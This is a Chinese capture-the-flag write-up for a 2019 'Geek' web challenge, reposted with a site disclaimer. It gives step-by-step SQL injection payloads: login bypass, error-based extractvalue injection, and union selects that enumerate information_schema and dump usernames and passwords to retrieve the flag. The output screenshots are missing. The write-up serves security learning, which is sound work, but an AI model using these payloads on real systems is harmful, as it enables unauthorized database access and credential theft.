标签：Web 极客 回显 union 2019 concat table payload select

打开题目：

尝试万能密码：

跳转到check.php页面，并得到用户名和密码

尝试密码md5解密失败
接下来，尝试常规的注入手段
payload:1' union select
出现报错回显，说明这里没有什么过滤

于是，开始爆数据库名-表名-字段名

1. 爆数据库名

• 方法1
  payload:1' union select * from a#
  报错回显为：
  
  可以得到数据库名为geek
• 方法2
  payload:1' and extractvalue(1,concat(1,database()))#
  

2. 寻找注入点

payload:1' union select 1,2,3,4#
回显：

说明没有这么多个字段
那把payload改成1' union select 1,2,3#

成功找到注入点

3. 爆表名

payload：1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
回显:

可以看到，数据库中存在geekuser和l0ve1ysq1这两个表

4. 爆字段名

payload:1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#
回显：

这里有3个字段：id,username和password
根据直觉，猜测flag应该在password字段中

5. 找password字段下的所有条目

payload:1' union select 1,2,group_concat(password) from l0ve1ysq1#
回显：

得到flag

标签：Web,极客,回显,union,2019,concat,table,payload,select
来源： https://www.cnblogs.com/1dan/p/15509005.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。